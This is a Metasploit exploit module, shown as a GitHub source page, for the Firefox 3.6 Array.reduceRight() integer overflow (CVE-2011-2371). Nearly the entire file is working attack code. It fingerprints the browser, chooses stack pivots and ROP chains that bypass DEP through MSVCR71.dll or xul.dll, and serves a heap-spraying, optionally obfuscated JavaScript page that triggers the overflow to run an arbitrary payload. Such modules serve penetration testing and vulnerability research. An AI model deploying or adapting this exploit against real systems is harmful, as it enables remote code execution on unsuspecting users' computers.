/
mozilla_reduceright.rb
345 lines (305 loc) · 10.3 KB
/
mozilla_reduceright.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => "Mozilla Firefox Array.reduceRight() Integer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Mozilla Firefox 3.6. When an
array object is configured with a large length value, the reduceRight() method
may cause an invalid index being used, allowing arbitrary remote code execution.
Please note that the exploit requires a longer amount of time (compare to a
typical browser exploit) in order to gain control of the machine.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Rohlf', #Matasano Security (Initial discovery according to Mozilla.org)
'Yan Ivnitskiy', #Matasano Security (Initial discovery with Chris?)
'Matteo Memelli', #PoC from Exploit-DB
'dookie2000ca', #"Helping" ryujin (Matteo)
'sinn3r', #Metasploit
'mr_me <steventhomasseeley[at]gmail.com>', #XP target (no aslr)
'TecR0c <roccogiovannicalvi[at]gmail.com>', #XP target (no aslr)
],
'References' =>
[
['CVE', '2011-2371'],
['OSVDB', '73184'],
['EDB', '17974'],
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=664009']
],
'Payload' =>
{
'BadChars' => "\x00",
'PrependEncoder' => "\xbc\x0c\x0c\x0c\x0c",
},
'DefaultOptions' =>
{
'EXITFUNC' => "process",
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
[
# if we dont have aslr, lets not deal with it
# Windows XP (no JAVA)
'Mozilla Firefox 3.6.16 (no JAVA)',
{
'pivot' => 0x104C26F0, # 1st pivot [push esi;pop esp;and [esi+44],0;xor eax,eax;pop esi;retn 4]
'pivot2' => 0x10055326, # 2nd pivot [add esp,40;ret]
}
],
[
#Vista / win 7 (using JAVA) to defeat aslr
'Mozilla Firefox 3.6.16 (JAVA)',
{
'pivot' => 0x7c370eef, # 1st pivot [lea esp,[esi-3];dec [ebx];ret 1C75]
'pivot2' => 0xcafebabe, # fake
}
],
],
'Privileged' => false,
'DisclosureDate' => "Jun 21 2011",
'DefaultTarget' => 0
))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
])
end
def junk(n=4)
return rand_text_alpha(n).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
if agent !~ /Firefox\/3\.6\.(16|17)/
print_error("This browser is not supported: #{agent}")
send_not_found(cli)
return
end
my_target = target
if my_target.name == 'Automatic'
if agent =~ /NT 5\.1/ && agent =~ /Firefox\/3\.6\.16/
my_target = targets[1]
elsif agent =~ /NT 6\.[01]/ && agent =~ /Firefox\/3\.6\.16/
my_target = targets[2]
else
print_error("This browser is not a viable target: #{agent}")
send_not_found(cli)
return
end
end
table = [junk(2)].pack('v*')
table << [
0x0c000048,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
].pack('V*')
table << [junk(2)].pack('v*')
table << [
my_target['pivot'],
junk,
].pack('V*')
table << [junk(2)].pack('v*')
table << [
0x3410240c,
0x0c00007c,
my_target['pivot2'],
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
0x0c00002e,
].pack('V*')
# random
js_applet = rand_text_alpha(rand(10) + 5)
a_trigger = rand_text_alpha(rand(10) + 5)
randnop = rand_text_alpha(rand(100) + 1)
js_nops = Rex::Text.to_unescape("\x0c"*4)
if my_target.name =~ /\(JAVA\)/
#mona.py tekniq! + Payload
rop = [
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # Make EAX readable
0x7c37591f, # PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll)
0x7c348b06, # EBP (NOP)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x7c37a140, # <- VirtualProtect() found in IAT
0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)
0x7c346c0b, # Slide, so next gadget would write to correct stack location
0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)
0x7c348b06, # EDI (filler)
0x7c348b06, # will be patched at runtime (VP), then picked up into ESI
0x7c348b06, # EBX (filler)
0x7c376402, # POP EBP # RETN (msvcr71.dll)
0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0xfffff82f, # size 20001 bytes
0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)
0x7c354901, # POP EBX # RETN (MSVCR71.dll)
0xffffffff, # pop value into ebx
0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)
0x7c34d201, # POP ECX # RETN (MSVCR71.dll)
0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)
0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)
0x7c34b8d8, # ROP NOP (-> edi)
0x7c344f87, # POP EDX # RETN (MSVCR71.dll)
0xffffffc0, # value to negate, target value : 0x00000040, target: edx
0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)
0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)
0x90909090, # NOPS (-> eax)
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)
].pack('V*')
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
js_payload = Rex::Text.to_unescape(rop + p, arch)
js_ptrs = Rex::Text.to_unescape(table, arch)
#Pretty much based on Matteo's code except for the size adjustment to avoid a busted heap
js = <<-JS
var applet = document.getElementById('#{js_applet}');
function spray() {
var ptrs = unescape("#{js_ptrs}");
var bheader = 0x12/2;
var nullt = 0x2/2;
var espoffset = (7340 /2) - ptrs.length;
var #{randnop} = "#{js_nops}";
var esppadding = unescape(#{randnop});
while(esppadding.length < espoffset) esppadding += esppadding;
esppadding = esppadding.substring(0, espoffset);
var payload = unescape("#{js_payload}");
var tr_padding = unescape(#{randnop});
while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
var dummy = ptrs + esppadding + payload + tr_padding;
var hspray = dummy.substring(0,0x7fa00 - bheader - nullt);
HeapBlocks = new Array()
for (i=0;i<0x60;i++){
HeapBlocks[i] += hspray;
}
}
spray();
obj = new Array;
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f,1,2,3);
JS
js = js.gsub(/^ {4}/, '')
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
html = <<-HTML
<html>
<head>
</head>
<body>
<applet id="#{js_applet}" code="#{a_trigger}.class" width=0 height=0>
</applet>
<script>
#{js}
</script>
</body>
<html>
HTML
elsif my_target.name =~ /\(no JAVA\)/
# DEP bypass using xul.dll
rop =
[
junk,
junk,
junk,
junk,
junk,
0x101f1806, # POP EAX # RETN [xul.dll]
0x1083828C, # ptr to &VirtualAlloc() [IAT xul.dll]
0x103e0d7b, # MOV ESI,DWORD PTR DS:[EAX] # RETN [xul.dll]
0x102d8002, # POP EBP # RETN [xul.dll]
0x1003876b, # & jmp esp [xul.dll]
0x10040001, # POP EBX # RETN [xul.dll]
0x00000001, # 0x00000001-> ebx
0x104e6917, # POP EDX # RETN [xul.dll]
0x00001000, # 0x00001000-> edx
0x102ac000, # POP ECX # RETN [xul.dll]
0x00000040, # 0x00000040-> ecx
0x102e0005, # POP EDI # RETN [xul.dll]
0x102ac001, # RETN (ROP NOP) [xul.dll]
0x101f1806, # POP EAX # RETN [xul.dll]
0x90909090, # nop
0x102b3401, # PUSHAD # RETN [xul.dll]
].pack("V*")
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
js_payload = Rex::Text.to_unescape(rop + p, arch)
js_ptrs = Rex::Text.to_unescape(table, arch)
# java loading forces the alloctor to use more blocks, since we
# dont load java we will just spray a little more..
js = <<-JS
var myobject = document.getElementById('d');
function spray() {
var ptrs = unescape("#{js_ptrs}");
var bheader = 0x12/2;
var nullt = 0x2/2;
var payload = unescape("#{js_payload}");
var #{randnop} = "#{js_nops}";
var tr_padding = unescape(#{randnop});
while (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
var dummy = ptrs + payload + tr_padding;
var hspray = dummy.substring(0,0x7fa00 - bheader - nullt);
HeapBlocks = new Array()
for (i=0;i<0x100;i++){
HeapBlocks[i] += hspray;
}
}
spray();
obj = new Array;
obj.length = 2197815302;
f = function trigger(prev, myobj, indx, array) {
alert(myobj[0]);
}
obj.reduceRight(f,1,2,3);
JS
if datastore['OBFUSCATE']
js = ::Rex::Exploitation::JSObfu.new(js)
js.obfuscate(memory_sensitive: true)
end
js = js.gsub(/^ {4}/, '')
html = <<-HTML
<html>
<head>
</head>
<body>
<object id="d"><object>
<script>
#{js}
</script>
</body>
<html>
HTML
end
html = html.gsub(/^ {4}/, '')
print_status("Sending #{self.name}")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end